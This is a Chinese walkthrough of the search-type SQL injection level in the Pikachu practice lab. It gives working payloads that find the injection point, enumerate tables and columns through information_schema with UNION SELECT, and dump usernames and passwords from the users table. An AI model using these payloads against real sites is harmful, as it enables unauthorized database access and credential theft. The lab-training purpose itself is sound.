Pikachu靶场-SQL注入-搜索型注入过关步骤

首先要明白MySQL数据库模糊搜索的语句，like ‘常%’、like ‘%常’、like ‘%常%’ 这个几个，这里就不详说这个语句了

判断注入点

不知道怎么写的代码以下几种语句都可以试试

这关我用的搜索型注入语句： v%’ and -1=-1 – bbq

网上查到的搜索型注入语句： ‘and 1=1 and ‘%’=’

%’ and 1=1–’

%’ and 1=1 and ‘%’=’ 单引号闭合的时候报了一个错误，这说明大概是 %xx%、xx%吧

直接上过程动图吧，看不清点击图片放大查看：

判断有多少个字段数

这关有4个，直接上动图：

展示显错位

查询当前数据库

version()查看数据库版本 ,database()查看当前数据库

v%' union select version(),database(),33 -- bbq

查询出数据库中的所有表

如果表多页面展示不全，可以使用 LIMIT 一页页展示，也可以使用group_concat() 拼接函数将显示的字段名包起来展示

v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq

查询指定的表中的列名

查询出表名下一步就是，查询字段也就是列名称

v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq

查询数据

当经过以上步骤，已经知道了数据库名、表名、字段名，那么就可以查询我们需要的数据了

v%' union select username,password,33 from users -- bbq